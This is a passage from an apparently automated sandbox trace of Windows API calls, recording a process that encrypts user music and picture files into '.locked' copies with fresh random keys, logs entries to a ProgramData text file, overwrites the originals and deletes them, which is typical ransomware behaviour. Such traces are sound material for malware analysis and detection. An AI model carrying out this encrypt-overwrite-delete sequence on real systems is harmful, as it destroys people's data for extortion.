(lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\8261.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\8261.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0310.348] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x125dce88 | out: lpMode=0x125dce88) returned 0 [0310.348] WriteFile (in: hFile=0x1b0, lpBuffer=0x14a86000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dce78, lpOverlapped=0x0 | out: lpBuffer=0x14a86000*, lpNumberOfBytesWritten=0x125dce78*=0xfa000, lpOverlapped=0x0) returned 1 [0310.374] CloseHandle (hObject=0x1b0) returned 1 [0310.557] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0310.633] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\8261.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\8261.mp3")) returned 1 [0310.739] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0310.781] SetEvent (hEvent=0x190) returned 1 [0310.781] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0310.793] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1265da24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x1265da24*=0xc) returned 1 [0310.834] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\pqkT0R1dikE\\t8_9l3f-.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\pqkt0r1dike\\t8_9l3f-.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0310.835] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0310.835] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\pqkT0R1dikE\\t8_9l3f-.mp3.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\pqkt0r1dike\\t8_9l3f-.mp3.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0310.856] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0311.060] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0311.060] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e020 | out: pbBuffer=0x1263e020) returned 1 [0311.060] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8020 | out: pbBuffer=0x124a8020) returned 1 [0311.061] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0311.061] WriteFile (in: hFile=0x1f4, lpBuffer=0x126df000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1265dd78, lpOverlapped=0x0 | out: lpBuffer=0x126df000*, lpNumberOfBytesWritten=0x1265dd78*=0x80, lpOverlapped=0x0) returned 1 [0311.066] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x0 [0311.070] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb30, ulCount=0x10, ulNumEntriesRemoved=0x336afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb30, ulNumEntriesRemoved=0x336afb10) returned 0 [0311.070] SetEvent (hEvent=0x150) returned 1 [0311.070] SetEvent (hEvent=0x214) returned 1 [0311.070] SetEvent (hEvent=0x1f0) returned 1 [0311.070] SetEvent (hEvent=0x14c) returned 1 [0311.070] ReadFile (in: hFile=0x224, lpBuffer=0x16246000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265dd68, lpOverlapped=0x0 | out: lpBuffer=0x16246000*, lpNumberOfBytesRead=0x1265dd68*=0xe82e, lpOverlapped=0x0) returned 1 [0311.073] WriteFile (in: hFile=0x1f4, lpBuffer=0x16246000*, nNumberOfBytesToWrite=0xe82e, lpNumberOfBytesWritten=0x1265dd74, lpOverlapped=0x0 | out: lpBuffer=0x16246000*, lpNumberOfBytesWritten=0x1265dd74*=0xe82e, lpOverlapped=0x0) returned 1 [0311.103] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0311.830] ReadFile (in: hFile=0x224, lpBuffer=0x16246000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265dd68, lpOverlapped=0x0 | out: lpBuffer=0x16246000*, lpNumberOfBytesRead=0x1265dd68*=0x0, lpOverlapped=0x0) returned 1 [0311.831] CloseHandle (hObject=0x1f4) returned 1 [0311.831] CloseHandle (hObject=0x224) returned 1 [0311.831] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0311.832] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x1265de94 | out: lpMode=0x1265de94) returned 0 [0311.832] WriteFile (in: hFile=0x224, lpBuffer=0x123a81c0*, nNumberOfBytesToWrite=0x64, lpNumberOfBytesWritten=0x1265de64, lpOverlapped=0x0 | out: lpBuffer=0x123a81c0*, lpNumberOfBytesWritten=0x1265de64*=0x64, lpOverlapped=0x0) returned 1 [0311.832] CloseHandle (hObject=0x224) returned 1 [0311.832] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\pqkT0R1dikE\\t8_9l3f-.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\pqkt0r1dike\\t8_9l3f-.mp3")) returned 1 [0312.006] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\pqkT0R1dikE\\t8_9l3f-.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\pqkt0r1dike\\t8_9l3f-.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0312.541] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0312.548] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1265de88 | out: lpMode=0x1265de88) returned 0 [0312.548] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0312.747] WriteFile (in: hFile=0x1bc, lpBuffer=0x154e8000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1265de78, lpOverlapped=0x0 | out: lpBuffer=0x154e8000*, lpNumberOfBytesWritten=0x1265de78*=0xfa000, lpOverlapped=0x0) returned 1 [0312.775] CloseHandle (hObject=0x1bc) returned 1 [0312.776] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\pqkT0R1dikE\\t8_9l3f-.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\pqkt0r1dike\\t8_9l3f-.mp3")) returned 1 [0312.807] WriteFile (in: hFile=0x1a4, lpBuffer=0x151cc000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dbe78, lpOverlapped=0x0 | out: lpBuffer=0x151cc000*, lpNumberOfBytesWritten=0x125dbe78*=0xfa000, lpOverlapped=0x0) returned 1 [0312.834] CloseHandle (hObject=0x1a4) returned 1 [0312.835] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\tTnyiBf8Er6HDgClHWhw.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\ttnyibf8er6hdgclhwhw.wav")) returned 1 [0312.860] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0312.971] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0312.972] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0312.975] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c220*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x123a3a24, lpReserved=0x0 | out: lpBuffer=0x1234c220*, lpNumberOfCharsWritten=0x123a3a24*=0xc) returned 1 [0312.988] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0313.009] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0313.016] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0313.025] SetEvent (hEvent=0x1f0) returned 1 [0313.025] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0313.038] SetEvent (hEvent=0x22c) returned 1 [0313.039] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0313.052] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0313.053] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0313.057] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0313.057] SetEvent (hEvent=0x190) returned 1 [0313.057] SetEvent (hEvent=0x1b8) returned 1 [0313.057] SetEvent (hEvent=0x184) returned 1 [0313.057] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0313.058] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb34, ulCount=0x10, ulNumEntriesRemoved=0x336afb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb34, ulNumEntriesRemoved=0x336afb14) returned 0 [0313.058] SetEvent (hEvent=0x184) returned 1 [0313.058] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1265da24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x1265da24*=0xc) returned 1 [0313.064] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\Qp2s6QL8pHTr dp7.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\qp2s6ql8phtr dp7.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0313.065] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0313.065] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\Qp2s6QL8pHTr dp7.gif.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\qp2s6ql8phtr dp7.gif.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0313.066] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0313.066] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c220 | out: pbBuffer=0x1234c220) returned 1 [0313.066] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e040 | out: pbBuffer=0x1234e040) returned 1 [0313.066] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702601 | out: pbBuffer=0x12702601) returned 1 [0313.066] WriteFile (in: hFile=0x1e0, lpBuffer=0x126c7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1265dd78, lpOverlapped=0x0 | out: lpBuffer=0x126c7000*, lpNumberOfBytesWritten=0x1265dd78*=0x80, lpOverlapped=0x0) returned 1 [0313.069] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x0 [0313.070] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb30, ulCount=0x10, ulNumEntriesRemoved=0x336afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb30, ulNumEntriesRemoved=0x336afb10) returned 0 [0313.070] SetEvent (hEvent=0x150) returned 1 [0313.070] SetEvent (hEvent=0x22c) returned 1 [0313.070] SetEvent (hEvent=0x1b8) returned 1 [0313.070] ReadFile (in: hFile=0x1a4, lpBuffer=0x14c9a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265dd68, lpOverlapped=0x0 | out: lpBuffer=0x14c9a000*, lpNumberOfBytesRead=0x1265dd68*=0x13251, lpOverlapped=0x0) returned 1 [0313.074] WriteFile (in: hFile=0x1e0, lpBuffer=0x14c9a000*, nNumberOfBytesToWrite=0x13251, lpNumberOfBytesWritten=0x1265dd74, lpOverlapped=0x0 | out: lpBuffer=0x14c9a000*, lpNumberOfBytesWritten=0x1265dd74*=0x13251, lpOverlapped=0x0) returned 1 [0313.109] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0313.154] SetEvent (hEvent=0x22c) returned 1 [0313.154] ReadFile (in: hFile=0x1a4, lpBuffer=0x14c9a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265dd68, lpOverlapped=0x0 | out: lpBuffer=0x14c9a000*, lpNumberOfBytesRead=0x1265dd68*=0x0, lpOverlapped=0x0) returned 1 [0313.154] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0313.181] SetEvent (hEvent=0x150) returned 1 [0313.181] SetEvent (hEvent=0x220) returned 1 [0313.181] CloseHandle (hObject=0x1e0) returned 1 [0313.181] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0313.448] CloseHandle (hObject=0x1a4) returned 1 [0313.448] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0313.448] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x1265de94 | out: lpMode=0x1265de94) returned 0 [0313.448] WriteFile (in: hFile=0x1a4, lpBuffer=0x12702600*, nNumberOfBytesToWrite=0x7b, lpNumberOfBytesWritten=0x1265de64, lpOverlapped=0x0 | out: lpBuffer=0x12702600*, lpNumberOfBytesWritten=0x1265de64*=0x7b, lpOverlapped=0x0) returned 1 [0313.449] CloseHandle (hObject=0x1a4) returned 1 [0313.449] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\Qp2s6QL8pHTr dp7.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\qp2s6ql8phtr dp7.gif")) returned 1 [0313.495] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x0 [0313.497] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb30, ulCount=0x10, ulNumEntriesRemoved=0x336afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb30, ulNumEntriesRemoved=0x336afb10) returned 0 [0313.497] SetEvent (hEvent=0x150) returned 1 [0313.497] SetEvent (hEvent=0x190) returned 1 [0313.497] SetEvent (hEvent=0x1dc) returned 1 [0313.497] SetEvent (hEvent=0x184) returned 1 [0313.499] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0313.502] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0313.502] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x0 [0313.503] SetEvent (hEvent=0x1f0) returned 1 [0313.503] SetEvent (hEvent=0x184) returned 1 [0313.503] SetEvent (hEvent=0x1dc) returned 1 [0313.503] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0313.505] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb34, ulCount=0x10, ulNumEntriesRemoved=0x336afb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb34, ulNumEntriesRemoved=0x336afb14) returned 0 [0313.505] SetEvent (hEvent=0x150) returned 1 [0313.505] SetEvent (hEvent=0x184) returned 1 [0313.505] SetEvent (hEvent=0x1dc) returned 1 [0313.505] SetEvent (hEvent=0x1f0) returned 1 [0313.506] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\Qp2s6QL8pHTr dp7.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\qp2s6ql8phtr dp7.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0313.521] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0313.656] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x1265de88 | out: lpMode=0x1265de88) returned 0 [0313.657] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0313.657] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x1276ee94 | out: lpMode=0x1276ee94) returned 0 [0313.657] SetEvent (hEvent=0x1e8) returned 1 [0313.657] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0313.662] SetEvent (hEvent=0x184) returned 1 [0313.662] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0313.687] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0313.699] SetEvent (hEvent=0x12c) returned 1 [0313.699] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0314.038] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\TwlVh5-7kS4lpqivPrW.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\twlvh5-7ks4lpqivprw.bmp")) returned 1 [0314.052] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0314.137] SetEvent (hEvent=0x22c) returned 1 [0314.137] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0314.148] SetEvent (hEvent=0x190) returned 1 [0314.148] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0314.155] SetEvent (hEvent=0x214) returned 1 [0314.155] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0314.155] SetEvent (hEvent=0x214) returned 1 [0314.155] SetEvent (hEvent=0x22c) returned 1 [0314.155] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0314.212] SetEvent (hEvent=0x12c) returned 1 [0314.212] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0314.253] SetEvent (hEvent=0x184) returned 1 [0314.253] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0314.258] SetEvent (hEvent=0x1e8) returned 1 [0314.258] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0314.377] SetEvent (hEvent=0x220) returned 1 [0314.377] SetEvent (hEvent=0x14c) returned 1 [0314.377] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0314.382] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0314.382] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x0 [0314.384] SetEvent (hEvent=0x14c) returned 1 [0314.384] SetEvent (hEvent=0x220) returned 1 [0314.384] SetEvent (hEvent=0x1b8) returned 1 [0314.384] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0314.386] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb34, ulCount=0x10, ulNumEntriesRemoved=0x336afb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb34, ulNumEntriesRemoved=0x336afb14) returned 0 [0314.386] SetEvent (hEvent=0x1b8) returned 1 [0314.386] SetEvent (hEvent=0x1e8) returned 1 [0314.386] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0314.419] SetEvent (hEvent=0x184) returned 1 [0314.419] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0314.529] SetEvent (hEvent=0x184) returned 1 [0314.529] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0314.537] SetEvent (hEvent=0x214) returned 1 [0314.537] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0314.544] SetEvent (hEvent=0x1b8) returned 1 [0314.545] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0314.551] SetEvent (hEvent=0x1f0) returned 1 [0314.551] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0314.580] SetEvent (hEvent=0x22c) returned 1 [0314.580] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0314.628] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0314.635] SetEvent (hEvent=0x1e8) returned 1 [0314.635] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0315.360] SetEvent (hEvent=0x198) returned 1 [0315.360] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0315.364] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0315.364] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0315.369] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0315.369] SetEvent (hEvent=0x1e8) returned 1 [0315.369] SetEvent (hEvent=0x190) returned 1 [0315.369] SetEvent (hEvent=0x1f0) returned 1 [0315.369] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0315.374] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb34, ulCount=0x10, ulNumEntriesRemoved=0x336afb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb34, ulNumEntriesRemoved=0x336afb14) returned 0 [0315.374] SetEvent (hEvent=0x150) returned 1 [0315.374] SetEvent (hEvent=0x1f0) returned 1 [0315.374] SetEvent (hEvent=0x190) returned 1 [0315.374] SetEvent (hEvent=0x1dc) returned 1 [0315.374] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0315.406] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0315.411] SetEvent (hEvent=0x184) returned 1 [0315.412] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0315.438] SetEvent (hEvent=0x184) returned 1 [0315.438] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0315.478] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0315.479] SetEvent (hEvent=0x220) returned 1 [0315.479] SetEvent (hEvent=0x1f0) returned 1 [0315.479] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0315.598] SetEvent (hEvent=0x1f0) returned 1 [0315.599] SetEvent (hEvent=0x22c) returned 1 [0315.599] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0315.727] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0315.730] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\uf6wQ63liri5t-.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\uf6wq63liri5t-.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0315.892] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x1276ae88 | out: lpMode=0x1276ae88) returned 0 [0315.892] WriteFile (in: hFile=0x1c0, lpBuffer=0x18206000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276ae78, lpOverlapped=0x0 | out: lpBuffer=0x18206000*, lpNumberOfBytesWritten=0x1276ae78*=0xfa000, lpOverlapped=0x0) returned 1 [0315.917] CloseHandle (hObject=0x1c0) returned 1 [0315.949] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0315.996] SetEvent (hEvent=0x214) returned 1 [0315.996] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0316.025] SetEvent (hEvent=0x190) returned 1 [0316.025] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0316.029] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0316.029] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0316.033] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0316.033] SetEvent (hEvent=0x1e8) returned 1 [0316.034] SetEvent (hEvent=0x190) returned 1 [0316.034] SetEvent (hEvent=0x22c) returned 1 [0316.034] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0316.035] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb34, ulCount=0x10, ulNumEntriesRemoved=0x336afb14, dwMilliseconds=0x0, fAlertable=0 | out: 